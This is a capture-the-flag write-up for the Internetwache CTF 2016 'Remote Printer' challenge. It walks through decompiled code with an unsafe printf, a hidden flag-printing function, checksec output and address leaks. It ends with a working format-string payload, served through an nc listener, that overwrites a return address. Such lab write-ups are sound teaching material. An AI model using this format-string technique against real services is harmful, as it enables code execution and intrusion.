English [Internetwache CTF 2016] [Exploit 80 – Remote Printer] Write Up

Description

Internetwache CTF 2016 : Remote Printer
Category: Exploit Points: 80 Solves: 101 Description:

Description: Printer are very very important for offices. Especially for remote printing. My boss told me to build a tool for that task.

Attachment: exp80.zip

Service: 188.166.133.53:12377

Resolution

We start by inspecting the binary given:

RemotePrinter: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, BuildID[sha1]=0xea9ab23d0eafc41d4e10f7b362859f5275d7a156, stripped

We then test it a little bit, it’s asking for a remote server ip and port. The binary connects to that server, reads up to 2000 chars and print it on it’s standart input.
If we use IDA to inspect that method, we find the following:

void __cdecl sub_8048786(char *cp, int a2)
{
  char buf; // [sp+Ch] [bp-201Ch]@5
  struct sockaddr addr; // [sp+200Ch] [bp-1Ch]@3
  int fd; // [sp+201Ch] [bp-Ch]@1

  fd = socket(2, 1, 0);
  if ( fd == -1 )
  {
    puts("No socket :(");
  }
  else
  {
    *(_DWORD *)&addr.sa_data[2] = inet_addr(cp);
    addr.sa_family = 2;
    *(_WORD *)&addr.sa_data[0] = htons(a2);
    if ( connect(fd, &addr, 0x10u) >= 0 )
    {
      if ( recv(fd, &buf, 0x2000u, 0) >= 0 )
      {
        printf(&buf);
        close(fd);
      }
      else
      {
        puts("No data :(");
      }
    }
    else
    {
      perror("No communication :(\n");
    }
  }
}

We can see that the printf is not secure and we have a string format exploit. We also find that function that is never called:

.text:08048867 ; ---------------------------------------------------------------------------
.text:08048867                 push    ebp
.text:08048868                 mov     ebp, esp
.text:0804886A                 sub     esp, 48h
.text:0804886D                 sub     esp, 8
.text:08048870                 push    offset aR       ; "r"
.text:08048875                 push    offset aFlag_txt ; "flag.txt"
.text:0804887A                 call    _fopen
.text:0804887F                 add     esp, 10h
.text:08048882                 mov     [ebp-0Ch], eax
.text:08048885                 sub     esp, 4
.text:08048888                 push    dword ptr [ebp-0Ch]
.text:0804888B                 push    32h
.text:0804888D                 lea     eax, [ebp-3Eh]
.text:08048890                 push    eax
.text:08048891                 call    _fgets
.text:08048896                 add     esp, 10h
.text:08048899                 sub     esp, 0Ch
.text:0804889C                 push    dword ptr [ebp-0Ch]
.text:0804889F                 call    _fclose
.text:080488A4                 add     esp, 10h
.text:080488A7                 sub     esp, 8
.text:080488AA                 lea     eax, [ebp-3Eh]
.text:080488AD                 push    eax
.text:080488AE                 push    offset aYayFlagS ; "YAY, FLAG: %s\n"
.text:080488B3                 call    _printf
.text:080488B8                 add     esp, 10h
.text:080488BB                 nop
.text:080488BC                 leave
.text:080488BD                 retn

It’s opening a flag.txt file and writing it’s content on stdin.
We then run a little security check:

laxa:Challenges:00:55:00$ checksec --file RemotePrinter 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
No RELRO        No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   RemotePrinter

So after that, we check if the ASLR is enabled on the server by giving the server a payload like this “%p%p%p%p”, and the ASLR is off !
So, we need to find the offset of an EIP we are going to rewrite to the printflag function.
In order to achieve that, we disabled the ASLR on a VM and then made a local exploit rewriting the EIP after the function that reads the data from our server.
We also have the adress of the buffer containing the data from our server and we also get that information on the service of the challenge.
We can calculate the offset difference between our VM and the server by doing: address of the buffer on the server – address of the buffer on the VM
We then determine the offset of the EIP we want to rewrite on our VM and then add the offset previously calculated.
We then do a standard string exploit to rewrite only 2 bytes of this EIP since the 2 other bytes are already correctly set:

This was launched on our server receiving the connection from the binary

python -c 'print "\x0c\xdd\xff\xff%34915x%7$hn"' | nc -lnvp 2222

The flag is: IW{YVO_F0RmaTt3d_RMT_Pr1nT3R}

Leave a Reply

Your email address will not be published. Required fields are marked *